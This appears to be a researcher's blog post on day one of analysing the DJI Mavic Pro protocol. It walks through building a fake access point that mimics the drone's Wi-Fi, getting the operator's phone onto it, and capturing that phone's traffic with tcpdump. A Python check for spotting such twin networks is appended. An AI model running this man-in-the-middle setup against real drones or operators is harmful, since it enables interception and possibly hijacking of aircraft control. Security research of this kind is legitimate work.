DJI Protocol – Day 1 – Progress Report

The DJI Mavic Pro drone supports two modes of wireless operation:

  • Wifi: 2.4-2.4835 GHz; 5.725-5.850 GHz
  • SRRC: 2.4-2.4835 GHz; 5.725-5.850 GHz

Since we are just getting started, we won't deal with SDRs yet, so we switch the drone into Wifi operation mode and continue. The idea:

  1. Connect the notebook to the wireless drone network
  2. Create a fake drone AP on the same wireless network card
  3. Connect the drone’s operator phone to the fake AP
  4. Tunnel all packets from AP to the drone
  5. Profit?

Gathering Wifi details

During normal operation, the drone exposes its SSID, Mavic-3be509, and, more interestingly, uses WPA2 with the CCMP cipher. Hence we will configure our fake drone AP identically.

Faking Drone Network

My network interface is wlp6s0, as reported by ipconfig.

sudo apt install bash util-linux procps hostapd iproute2 iw wireless-tools haveged iptables dnsmasq git
cd ~/Downloads/
git clone https://github.com/oblique/create_ap.git
cd create_ap
sudo make install
# create_ap <ap-interface> <internet-interface> <ssid> <passphrase>; the notebook's wlp6s0 serves both roles
create_ap wlp6s0 wlp6s0 Drone 12345678 -w 2

We now connect a client to our Drone network and receive the following output:

create_ap also takes care of tunnelling all the traffic: the default option is -m nat (NAT), and -w 2 selects WPA2.

Profit?

We connect the notebook to the drone, create an AP and connect the phone to the AP; then we launch the app and see what happens. As it turns out, the communication works just fine, so no additional security measures have been put in place against such a man-in-the-middle (MITM) attack.
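As an added defender-side check (not part of the original post): to anyone scanning, the fake AP above looks like the drone's SSID and WPA2/CCMP configuration broadcast from a second BSSID, so a small parser over `iw dev wlp6s0 scan` output is enough to flag it. The scan text below is constructed, with locally administered (02:...) MAC addresses standing in for real BSSIDs.

```python
import re
from collections import defaultdict

# Constructed sample of `iw dev wlp6s0 scan` output (not a real capture): the
# drone's BSS plus a second BSS that advertises the same SSID with the same
# WPA2/CCMP settings, which is what the create_ap twin looks like over the air.
SAMPLE_SCAN = """\
BSS 02:00:00:00:00:01(on wlp6s0)
\tfreq: 2437
\tSSID: Mavic-3be509
\tRSN:\t * Version: 1
\t\t * Pairwise ciphers: CCMP
BSS 02:00:00:00:00:02(on wlp6s0)
\tfreq: 2412
\tSSID: Mavic-3be509
\tRSN:\t * Version: 1
\t\t * Pairwise ciphers: CCMP
BSS 02:00:00:00:00:03(on wlp6s0)
\tfreq: 5745
\tSSID: HomeNet
\tRSN:\t * Version: 1
\t\t * Pairwise ciphers: CCMP
"""

def parse_iw_scan(text):
    """Turn `iw dev <iface> scan` output into a list of per-BSS dicts."""
    networks, cur = [], None
    for line in text.splitlines():
        m = re.match(r"BSS ([0-9a-f:]{17})", line)
        if m:
            cur = {"bssid": m.group(1), "ssid": None, "freq": None, "pairwise": None}
            networks.append(cur)
        elif cur is not None:
            s = line.strip()
            if s.startswith("SSID:"):
                cur["ssid"] = s[5:].strip()
            elif s.startswith("freq:"):  # newer iw prints "freq: 2437.0"
                cur["freq"] = int(float(s[5:].strip()))
            elif s.startswith("* Pairwise ciphers:"):
                cur["pairwise"] = s.split(":", 1)[1].strip()
    return networks

def find_twins(networks):
    """Return {ssid: [bss, ...]} for every SSID advertised by more than one BSSID."""
    by_ssid = defaultdict(list)
    for n in networks:
        if n["ssid"]:
            by_ssid[n["ssid"]].append(n)
    return {ssid: bss for ssid, bss in by_ssid.items() if len(bss) > 1}
```

On a live system, feed `find_twins(parse_iw_scan(subprocess.check_output(["iw", "dev", "wlp6s0", "scan"], text=True)))` and compare the BSSIDs and channels reported against the one the drone is known to use.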

Packet dump

As it went much more smoothly than expected, we can proceed to dump all network packets to disk for further analysis, since one of our goals is to inject 'fake' packets into the normal communication flow.

sudo apt update && sudo apt install --assume-yes tcpdump

arp  # obtain the operator's IP address
sudo tcpdump --interface=ap0 -n host 192.168.12.139 -w ~/Downloads/dumps/drone-idle.pcap

It doesn't matter whether we listen on wlp6s0 or on the AP adapter called ap0, as neither should receive too many broadcasts. Moreover, we filter directly on the operator's smartphone's IP address with host 192.168.12.139; -n suppresses DNS resolution.

Next up: DJI Protocol – Day 2 – Progress Report
